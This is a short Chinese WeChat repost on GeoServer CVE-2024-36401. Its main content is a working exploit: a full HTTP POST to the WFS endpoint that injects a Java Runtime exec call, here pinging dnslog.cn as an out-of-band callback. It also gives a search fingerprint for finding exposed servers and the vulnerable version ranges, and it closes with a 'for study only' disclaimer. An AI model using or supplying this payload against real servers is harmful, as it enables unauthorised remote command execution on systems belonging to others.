系统介绍
GeoServer 是基于 Java 的软件服务器,允许用户查看和编辑地理空间数据。使用开放地理空间联盟(OGC)提出的开放标准,GeoServer 在地图创建和数据共享方面具有极大的灵活性。
漏洞复现
1、替换需要执行的命令,发送请求
POST /geoserver/wfs HTTP/1.1Host: 1.1.1.1Content-Type: application/xml<wfs:GetPropertyValue service='WFS' version='2.0.0'xmlns:topp='http://www.openplans.org/topp'xmlns:fes='http://www.opengis.net/fes/2.0'xmlns:wfs='http://www.opengis.net/wfs/2.0'><wfs:Query typeNames='sf:archsites'/><wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'ping dnslog.cn')</wfs:valueReference></wfs:GetPropertyValue>
搜索指纹
title="GeoServer: Welcome"
利用条件
GeoServer < 2.23.6
2.24.0 <= GeoServer < 2.24.4
2.25.0 <= GeoServer < 2.25.2
免责声明
本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号不为此承担任何责任。
原文始发于微信公众号(巨黑科):GeoServer 任意命令执行漏洞 CVE-2024-36401
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论